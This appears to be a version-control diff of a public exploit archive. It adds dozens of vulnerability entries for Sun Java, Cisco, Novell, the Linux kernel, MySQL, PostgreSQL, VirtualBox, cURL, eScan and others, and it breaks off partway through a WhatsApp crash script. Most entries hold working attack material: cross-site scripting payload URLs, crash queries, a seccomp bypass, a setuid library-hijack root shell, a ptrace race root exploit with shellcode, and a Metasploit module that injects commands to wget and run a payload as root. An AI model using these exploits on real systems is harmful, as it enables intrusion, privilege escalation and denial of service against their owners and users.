Sun Java System Messenger Express 6.3-0.15 is vulnerable; other versions may also be affected.
http://example.com/?user=admin&error= <http://example.com/?user=admin&error=>"><script>alert(1);</script>

7
platforms/java/webapps/32862.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/34153/info
Sun Java System Calendar Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
https://www.example.com:3443//command.shtml?view=overview&id=HK8CjQOkmbY&date=20081217T200734%27;alert('xss');//Z&caliad=someid@test.com&security=1

7
platforms/java/webapps/32863.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/34154/info
Sun Java System Communications Express is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
https://www.example.com/uwc/abs/search.xml?bookid=e11e46531a8a0&j_encoding=UTF-8&uiaction=quickaddcontact&entryid=&valueseparator=%3B&prefix=abperson_&stopalreadyselected=1&isselchanged=0&idstoadd=&selectedbookid=&type=abperson%2Cgroup&wcfg_groupview=&wcfg_searchmode=&stopsearch=1&expandgroup=&expandselectedgroup=&expandonmissing=&nextview=&bookid=e11e46531a8a0&actionbookid=e11e46531a8a0&searchid=7&filter=entry%2Fdisplayname%3D*&firstentry=0&sortby=%2Bentry%2Fdisplayname&curbookid=e11e46531a8a0&searchelem=0&searchby=contains&searchstring=Search+for&searchbookid=e11e46531a8a0&abperson_givenName=aa&abperson_sn=aa&abperson_piEmail1=a%40a.com&abperson_piEmail1Type=work&abperson_piPhone1=11&abperson_piPhone1Type=work&quickaddprefix=abperson_&abperson_displayName=%3Cscript%3Ealert%28%27xss2%27%29%3C%2Fscript%3E%2C+%3Cscript%3Ealert%28%27xss1%27%29%3C%2Fscript%3E&abperson_entrytype=abperson&abperson_memberOfPIBook=e11e46531a8a0

14
platforms/java/webapps/32864.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/34155/info
Sun Java System Communications Express is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
This issue is tracked by Sun Alert ID 258068.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
The following are vulnerable:
Sun Java System Communications Express 6.3 for Sun Java Communications Suite 5 and 6
Sun Java System Communications Express 6 2005Q4 (6.2)
http://www.example.com/uwc/base/UWCMain?anon=true&calid=test@test.com&caltype=temporaryCalids&date=20081223T143836Z&category=All&viewctx=day&temporaryCalendars=test@test.com%27;alert(%27hello%27);a=%27

17
platforms/java/webapps/32897.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/34454/info
Cisco Subscriber Edge Services Manager is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
We don't know which versions of Subscriber Edge Services Manager are affected. We will update this BID as more information emerges.
http://www.example.com/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3Dhttp%253A//host/&browser=explorer&version=6&javascript=1.3&
getElementById=true&getElementTagName=true&documentElement=true&anchors=true&regexp=true&option=true&all=true&cookie=true&images=true&layers=false&forms=
true&links=true&frames=true&screen=%20true"><script>alert(1);</script>"
http://www.example.com/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3D%22%3E%3C&browser=explorer&version=6&javascript=1.3&getElem
entById=true&getElementTagName=true&documentElement=true&anchors=true&regexp=true&option=true&all=true&cookie=true&images=true&layers=false&forms=true&li
nks=true<a%20href%20=%20"http://www.host.net">HTML
Injection</a>&frames=true&screen=true&

11
platforms/java/webapps/32909.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34531/info
Novell Teaming is prone to a user-enumeration weakness and multiple cross-site scripting vulnerabilities.
A remote attacker can exploit the user-enumeration weakness to enumerate valid usernames and then perform brute-force attacks; other attacks are also possible.
The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Novell Teaming 1.0.3 is vulnerable; other versions may also be affected.
https://www.example.com/web/guest/home?p_p_id=82&p_p_action=1&p_p_state=%3Cscript%3Ealert('xss+vulnerability')%3C/script%3E&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=1&p_p_col_count=2&_82_struts_action=%2Flanguage%2Fview&_82_languageId=de_DE

9
platforms/linux/dos/32775.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33618/info
The Linux kernel is prone to a local denial-of-service vulnerability because it fails to properly handle malformed filesystem images.
Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users. Note that to exploit this issue, attackers must be able to mount appropriate filesystem types, which may require membership in a privileged group or root access.
This issue affects versions prior to Linux kernel 2.6.27.14.
http://www.exploit-db.com/sploits/32775.gz

9
platforms/linux/dos/32800.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33749/info
Poppler is prone to multiple denial-of-service vulnerabilities when handling malformed PDF files.
Successfully exploiting this issue allows remote attackers to crash applications that use the vulnerable library, denying service to legitimate users.
These issues affect versions prior to Poppler 0.10.4.
http://www.exploit-db.com/sploits/32800.pdf

13
platforms/linux/dos/32838.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/33972/info
MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain XPath expressions.
An attacker can exploit this issue to crash the application, denying access to legitimate users.
This issue affects:
MySQL 5.1.31 and earlier
MySQL 6.0.9 and earlier
select updatexml('','0/a','');
select extractvalue('','0/a');

13
platforms/linux/dos/32849.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/34090/info
PostgreSQL is prone to a remote denial-of-service vulnerability.
Exploiting this issue may allow attackers to terminate connections to the PostgreSQL server, denying service to legitimate users.
test=# CREATE DEFAULT CONVERSION test1 FOR 'LATIN1' TO 'KOI8' FROM
ascii_to_mic;
CREATE CONVERSION
test=# CREATE DEFAULT CONVERSION test2 FOR 'KOI8' TO 'LATIN1' FROM
mic_to_ascii;
CREATE CONVERSION
test=# set client_encoding to 'LATIN1';

7
platforms/linux/dos/32856.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/34136/info
MPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed media files.
Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
http://www.exploit-db.com/sploits/32856.aac

7
platforms/linux/dos/32857.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/34136/info
MPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed media files.
Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
http://www.exploit-db.com/sploits/32857.ogm

41
platforms/linux/local/32815.c Executable file
View file

@ -0,0 +1,41 @@
source: http://www.securityfocus.com/bid/33906/info
The Linux kernel is prone to an origin-validation weakness when dealing with signal handling.
This weakness occurs when a privileged process calls attacker-supplied processes as children. Attackers may exploit this to send arbitrary signals to the privileged parent process.
A local attacker may exploit this issue to kill vulnerable processes, resulting in a denial-of-service condition. In some cases, other attacks may also be possible.
Linux kernel 2.6.28 is vulnerable; other versions may also be affected.
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>
static int the_child(void* arg) {
sleep(1);
_exit(2);
}
int main(int argc, const char* argv[]) {
int ret = fork();
if (ret < 0)
{
perror("fork");
_exit(1);
}
else if (ret > 0)
{
for (;;);
}
setgid(99);
setuid(65534);
{
int status;
char* stack = malloc(4096);
int flags = SIGKILL | CLONE_PARENT;
int child = clone(the_child, stack + 4096, flags, NULL);
}
_exit(100);
}

30
platforms/linux/local/32820.txt Executable file
View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/33922/info
OpenSC is prone to an unauthorized-access vulnerability.
Attackers can exploit this issue to gain unauthorized access to private data, which may lead to other attacks.
Versions prior to OpenSC 0.11.7 are vulnerable.
The following proof of concept is available:
create a file with a secret:
echo "This is my secret data" > secret-file
To initialise a blank card:
pkcs15-init --create-pkcs15 --use-default-transport-keys --profile pkcs15+onepin --pin 123456 --puk 78907890
To write a private data object to the card:
pkcs11-tool --label "my secret" --type data --write-object secret-file
--private --login --pin 12345
To see all objects on the card:
pkcs15-tool --dump
This will list the data object, including the path it is stored, e.g.:
"Path: 3f0050154701"
To access such an object with low-level tools:
opensc-explorer
cd 5015
get 4701

65
platforms/linux/local/32829.c Executable file
View file

@ -0,0 +1,65 @@
source: http://www.securityfocus.com/bid/33948/info
The Linux kernel is prone to a local security-bypass vulnerability.
A local attacker may be able to exploit this issue to bypass access control and make restricted system calls, which may result in an elevation of privileges.
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
return 2;
}

42
platforms/linux/local/32848.txt Executable file
View file

@ -0,0 +1,42 @@
source: http://www.securityfocus.com/bid/34080/info
Sun xVM VirtualBox is prone to a local privilege-escalation vulnerability.
An attacker can exploit this vulnerability to run arbitrary code with superuser privileges.
The following versions for the Linux platform are vulnerable:
Sun xVM VirtualBox 2.0
Sun xVM VirtualBox 2.1
$ id -u
1002
$ cat test.c
#include <unistd.h>
#include <sys/syscall.h>
__attribute__((constructor))
void awesome(void)
{
char *argv[] = { "sh", NULL };
extern char *environ;
syscall(SYS_setuid, 0);
syscall(SYS_execve, "/bin/sh", argv, environ);
}
$ gcc -Wall test.c -fPIC -shared -o libdl.so.2 -Wl,-soname,libdl.so.2
$ ls -l /opt/VirtualBox/VirtualBox
-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 /opt/VirtualBox/VirtualBox
$ ln /opt/VirtualBox/VirtualBox
$ ls -l VirtualBox
-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 VirtualBox
$ ./VirtualBox
./VirtualBox: /home/vapier/libdl.so.2: no version information available
(required by ./VirtualBox)
sh-4.0# whoami
root

202
platforms/linux/local/8678.c
View file

@ -1,101 +1,101 @@
/*
* GNU/Linux kernel 2.6.29 ptrace_attach() local root race condition exploit.
* ==========================================================================
* This is a local root exploit for the 2.6.29 ptrace_attach() race condition that allows
* a process to gain elevated privileges under certain conditions. The vulnerability is
* caused due to "ptrace_attach()" using an inadequate mutex while synchronizing with
* "execve()". This can be exploited to potentially execute arbitrary code with root
* privileges by attaching to a setuid process. The race is particularly narrow, this
* exploit checks that it has attached to the correct process before attempting to
* inject shellcode which helps reduce false positives and shells being spawned with
* lower privileges.
*
* Ex.
* matthew@matthew-desktop:~$ id
* uid=1000(matthew) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),
* 29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
* matthew@matthew-desktop:~$ uname -a
* Linux matthew-desktop 2.6.29-020629-generic #020629 SMP Tue Mar 24 12:03:21 UTC 2009 i686 GNU/Linux
* matthew@matthew-desktop:~$ while `/bin/true/`;do ./shoryuken;done
* [... much scroll removed, go make coffee, get a job, do something while running ...]
* /dev/sda1 on / type ext3 (rw,relatime,errors=remount-ro)
* proc on /proc type proc (rw,noexec,nosuid,nodev)
* /sys on /sys type sysfs (rw,noexec,nosuid,nodev)
* varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755)
* varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777)
* udev on /dev type tmpfs (rw,mode=0755)
* devshm on /dev/shm type tmpfs (rw)
* devpts on /dev/pts type devpts (rw,gid=5,mode=620)
* securityfs on /sys/kernel/security type securityfs (rw)
* gvfs-fuse-daemon on /home/matthew/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=matthew)
* [ WIN! 18281
* [ Overwritten 0xb8097430
* # id
* uid=0(root) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),
* 44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
* #
*
* Please note this exploit is released to you under fuqHAK5 licence agreement, you may use
* this exploit, sell it, recode it, rip the header and claim it as your own on the condition
* that you are not a fan of the hak5 tv "hacking" show. This exploit must not be renamed from
* shoryuken.c at any time.
*
* -- prdelka
*/
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <linux/user.h>
#include <stdio.h>
#include <fcntl.h>
char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90"
"\x6a\x23\x58\x31"
"\xdb\xcd\x80"
"\x31\xdb\x8d\x43\x17\xcd\x80\x31\xc0"
"\x50\x68""//sh""\x68""/bin""\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main(){
pid_t child;
int eip, i = 0;
struct user_regs_struct regs;
char *argv[] = {"mount",0};
char *envp[] = {"",0};
child = fork();
if(child == 0) {
execve("/bin/mount",argv,envp);
}
else {
if(ptrace(PTRACE_ATTACH, child, NULL, NULL) == 0) {
char buf[256];
sprintf(buf, "/proc/%d/cmdline", child);
int fd = open(buf, O_RDONLY);
read(fd, buf, 2);
close(fd);
if(buf[0] == 'm') {
printf("[ WIN! %d\n", child);
fflush(stdout);
ptrace(PTRACE_GETREGS, child, NULL, &regs);
eip = regs.eip;
while (i < strlen(shellcode)){
ptrace(PTRACE_POKETEXT, child, eip, (int) *(int *) (shellcode + i));
i += 4;
eip += 4;
}
printf("[ Overwritten 0x%x\n",regs.eip);
ptrace(PTRACE_SETREGS, child, NULL, &regs);
ptrace(PTRACE_DETACH, child, NULL,NULL);
usleep(1);
wait(0);
}
}
}
return 0;
}
// milw0rm.com [2009-05-14]
/*
* GNU/Linux kernel 2.6.29 ptrace_attach() local root race condition exploit.
* ==========================================================================
* This is a local root exploit for the 2.6.29 ptrace_attach() race condition that allows
* a process to gain elevated privileges under certain conditions. The vulnerability is
* caused due to "ptrace_attach()" using an inadequate mutex while synchronizing with
* "execve()". This can be exploited to potentially execute arbitrary code with root
* privileges by attaching to a setuid process. The race is particularly narrow, this
* exploit checks that it has attached to the correct process before attempting to
* inject shellcode which helps reduce false positives and shells being spawned with
* lower privileges.
*
* Ex.
* matthew@matthew-desktop:~$ id
* uid=1000(matthew) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),
* 29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
* matthew@matthew-desktop:~$ uname -a
* Linux matthew-desktop 2.6.29-020629-generic #020629 SMP Tue Mar 24 12:03:21 UTC 2009 i686 GNU/Linux
* matthew@matthew-desktop:~$ while `/bin/true/`;do ./shoryuken;done
* [... much scroll removed, go make coffee, get a job, do something while running ...]
* /dev/sda1 on / type ext3 (rw,relatime,errors=remount-ro)
* proc on /proc type proc (rw,noexec,nosuid,nodev)
* /sys on /sys type sysfs (rw,noexec,nosuid,nodev)
* varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755)
* varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777)
* udev on /dev type tmpfs (rw,mode=0755)
* devshm on /dev/shm type tmpfs (rw)
* devpts on /dev/pts type devpts (rw,gid=5,mode=620)
* securityfs on /sys/kernel/security type securityfs (rw)
* gvfs-fuse-daemon on /home/matthew/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=matthew)
* [ WIN! 18281
* [ Overwritten 0xb8097430
* # id
* uid=0(root) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),
* 44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
* #
*
* Please note this exploit is released to you under fuqHAK5 licence agreement, you may use
* this exploit, sell it, recode it, rip the header and claim it as your own on the condition
* that you are not a fan of the hak5 tv "hacking" show. This exploit must not be renamed from
* shoryuken.c at any time.
*
* -- prdelka
*/
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <linux/user.h>
#include <stdio.h>
#include <fcntl.h>
char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90"
"\x6a\x23\x58\x31"
"\xdb\xcd\x80"
"\x31\xdb\x8d\x43\x17\xcd\x80\x31\xc0"
"\x50\x68""//sh""\x68""/bin""\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main(){
pid_t child;
int eip, i = 0;
struct user_regs_struct regs;
char *argv[] = {"mount",0};
char *envp[] = {"",0};
child = fork();
if(child == 0) {
execve("/bin/mount",argv,envp);
}
else {
if(ptrace(PTRACE_ATTACH, child, NULL, NULL) == 0) {
char buf[256];
sprintf(buf, "/proc/%d/cmdline", child);
int fd = open(buf, O_RDONLY);
read(fd, buf, 2);
close(fd);
if(buf[0] == 'm') {
printf("[ WIN! %d\n", child);
fflush(stdout);
ptrace(PTRACE_GETREGS, child, NULL, &regs);
eip = regs.eip;
while (i < strlen(shellcode)){
ptrace(PTRACE_POKETEXT, child, eip, (int) *(int *) (shellcode + i));
i += 4;
eip += 4;
}
printf("[ Overwritten 0x%x\n",regs.eip);
ptrace(PTRACE_SETREGS, child, NULL, &regs);
ptrace(PTRACE_DETACH, child, NULL,NULL);
usleep(1);
wait(0);
}
}
}
return 0;
}
// milw0rm.com [2009-05-14]

32
platforms/linux/remote/32825.txt Executable file
View file

@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/33937/info
The 'djbdns' package is prone to a remote cache-poisoning vulnerability.
An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.
This issue affects djbdns 1.05; other versions may also be vulnerable.
# Download and build ucspi-tcp-0.88.
$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
$ tar -zxf ucspi-tcp-0.88.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc
$ make -C ucspi-tcp-0.88
# Download and build djbdns-1.05.
$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz
$ tar -zxf djbdns-1.05.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc
$ make -C djbdns-1.05
# Use tcpclient and axfr-get to do a zone transfer for
# www.example.com from www.example2.com.
$ ./ucspi-tcp-0.88/tcpclient www.example.com 53 ./djbdns-1.05/axfr-get www.example.com data data.tmp
# Use tinydns-data to compile data into data.cdb.
$ ./djbdns-1.05/tinydns-data
# Simulate an A query for www.example.com using the data
# from the zone transfer.
$ ./djbdns-1.05/tinydns-get a www.example.com

10
platforms/linux/remote/32834.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/33962/info
cURL/libcURL is prone to a security-bypass vulnerability.
Remote attackers can exploit this issue to bypass certain security restrictions and carry out various attacks.
This issue affects cURL/libcURL 5.11 through 7.19.3. Other versions may also be vulnerable.
The following example redirection request may be used to carry out this attack:
Location: scp://name:passwd@host/a'``;date >/tmp/test``;'

13
platforms/linux/remote/32837.py Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/33971/info
Wesnoth is prone to a remote code-execution vulnerability caused by a design error.
Attackers can exploit this issue to execute arbitrary Python code in the context of the user running the vulnerable application.
Versions prior to Wesnoth 1.5.11 are affected.
#!WPY
import threading
os = threading._sys.modules['os']
f = os.popen("firefox 'http://www.example.com'")
f.close()

4
platforms/linux/remote/764.c
View file

@ -1,4 +1,6 @@
/*
* http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
@ -1291,4 +1293,4 @@ int main(int argc, char* argv[])
}
/* spabam: It isn't 0day */
// milw0rm.com [2003-04-04]
// milw0rm.com [2003-04-04]

166
platforms/linux/webapps/32869.rb Executable file
View file

@ -0,0 +1,166 @@
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "eScan Web Management Console Command Injection",
'Description' => %q{
This module exploits a command injection vulnerability found in the eScan Web Management
Console. The vulnerability exists while processing CheckPass login requests. An attacker
with a valid username can use a malformed password to execute arbitrary commands. With
mwconf privileges, the runasroot utility can be abused to get root privileges. This module
has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Joxean Koret', # Vulnerability Discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'URL', 'http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz' ] # Syscan slides by Joxean
],
'Payload' =>
{
'BadChars' => "", # Real bad chars when injecting: "|&)(!><'\"` ", cause of it we're avoiding ARCH_CMD
'DisableNops' => true
},
'Arch' => ARCH_X86,
'Platform' => 'linux',
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
['eScan 5.5-2 / Linux', {}],
],
'DisclosureDate' => "Apr 04 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(10080),
OptString.new('USERNAME', [ true, 'A valid eScan username' ]),
OptString.new('TARGETURI', [true, 'The base path to the eScan Web Administration console', '/']),
OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
OptString.new('RUNASROOT', [ true, 'Path to the runasroot binary', '/opt/MicroWorld/sbin/runasroot' ]),
], self.class)
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s, 'index.php')
})
if res and res.code == 200 and res.body =~ /eScan WebAdmin/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end
def cmd_exec(session, cmd)
case session.type
when /meterpreter/
print_warning("#{peer} - Use a shell payload in order to get root!")
when /shell/
o = session.shell_command_token(cmd)
o.chomp! if o
end
return "" if o.nil?
return o
end
# Escalating privileges here because runasroot only can't be executed by
# mwconf uid (196).
def on_new_session(session)
cmd_exec(session, "#{datastore['RUNASROOT'].shellescape} /bin/sh")
super
end
def primer
@payload_url = get_uri
wget_payload
end
def on_request_uri(cli, request)
print_status("Request: #{request.uri}")
if request.uri =~ /#{Regexp.escape(get_resource)}/
print_status("Sending payload...")
send_response(cli, @pl)
end
end
def exploit
@pl = generate_payload_exe
if @pl.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
end
@payload_url = ""
if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
end
exec_payload
else
@payload_url = datastore['EXTURL']
wget_payload
exec_payload
end
end
# we execute in this way, instead of an ARCH_CMD
# payload because real badchars are: |&)(!><'"`[space]
def wget_payload
@dropped_elf = rand_text_alpha(rand(5) + 3)
command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
print_status("#{peer} - Downloading the payload to the target machine...")
res = exec_command(command)
if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/
register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf))
else
fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
end
end
def exec_payload
command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};"
command << File.join(datastore['WRITABLEDIR'], @dropped_elf)
print_status("#{peer} - Executing the payload...")
exec_command(command, 1)
end
def exec_command(command, timeout=20)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path.to_s, 'login.php'),
'vars_post' => {
'uname' => datastore['USERNAME'],
'pass' => ";#{command}",
'product_name' => 'escan',
'language' => 'English',
'login' => 'Login'
}
}, timeout)
end
end

9
platforms/multiple/dos/32836.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33969/info
Mozilla Firefox is prone to a remote denial-of-service vulnerability.
Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions.
Firefox 2.0.0.20 is vulnerable; other versions may also be affected.
<HTML><TITLE>FireFox Print() Function Malform input Crash</TITLE><BODY> <p1>--------------In The Name Of God---------------<br> <p1>---------Apa Center Of Yazd University---------<br> <p1>-------------Http://Www.Ircert.Cc--------------<br> <br>Tested On : FireFox <= 2.0.0.20 Fully Update <br>Note : If the browser alert for print choose cancel <br> <br>Author : b3hz4d (Seyed Behzad Shaghasemi) <br>Site : Www.DeltaHacking.Net <br>Date : 3 Mar 2009 <br>Contact: behzad_sh_66@yahoo.com <br>Special Thanks To : Str0ke, Dr.trojan, Cru3l.b0y, PLATEN, Bl4ck.Viper, Irsdl And all Iranian hackers </p1><br><br> <form> <input type="button" value="bo0o0o0om" onClick="window.print(window.print())" /> </form> </BODY></HTML>

118
platforms/multiple/dos/32865.py Executable file
View file

@ -0,0 +1,118 @@
#!/usr/bin/python
#-*- coding: utf-8 -*
# Title: WhatsApp Remote Crash on non-printable characters
# Product: WhatsApp
# Vendor Homepage: http://www.whatsapp.com
# Vulnerable Version(s): 2.11.7 and prior on iOS
# Tested on: WhatsApp v2.11.7 on iPhone 5 running iOS 7.0.4
# Solution Status: Fixed by Vendor on v2.11.8
# Date: 8/04/2014
#
# Authors:
# Jaime Sánchez @segofensiva <jsanchez (at) seguridadofensiva.com>
# Pablo San Emeterio @psaneme <psaneme (at) gmail.com>
#
# Custom message with non-printable characters will crash any WhatsApp client < v2.11.7 for iOS.
# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
# engaging in an interactive conversation over WhatsApp protocol
#
# More info at:
# http://www.seguridadofensiva.com/2014/04/crash-en-whatsapp-para-iphone-en-versiones-inferiores-a-2.11.7.html
# See the slides of the research/talk at RootedCON 2014 at:
# http://www.slideshare.net/segofensiva/whatsapp-mentiras-y-cintas-de-video-rootedcon-2014
import argparse, sys, os, csv
from Yowsup.Common.utilities import Utilities
from Yowsup.Common.debugger import Debugger
from Yowsup.Common.constants import Constants
from Examples.CmdClient import WhatsappCmdClient
from Examples.EchoClient import WhatsappEchoClient
from Examples.ListenerClient import WhatsappListenerClient
from Yowsup.Registration.v1.coderequest import WACodeRequest
from Yowsup.Registration.v1.regrequest import WARegRequest
from Yowsup.Registration.v1.existsrequest import WAExistsRequest
from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
from Yowsup.Contacts.contacts import WAContactsSyncRequest
import threading,time, base64
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
COUNTRIES_CSV = "countries.csv"
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
######## Yowsup Configuration file #####################
# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n
# phone: Your full phone number including country code, without '+' or '00'
# id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
# on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
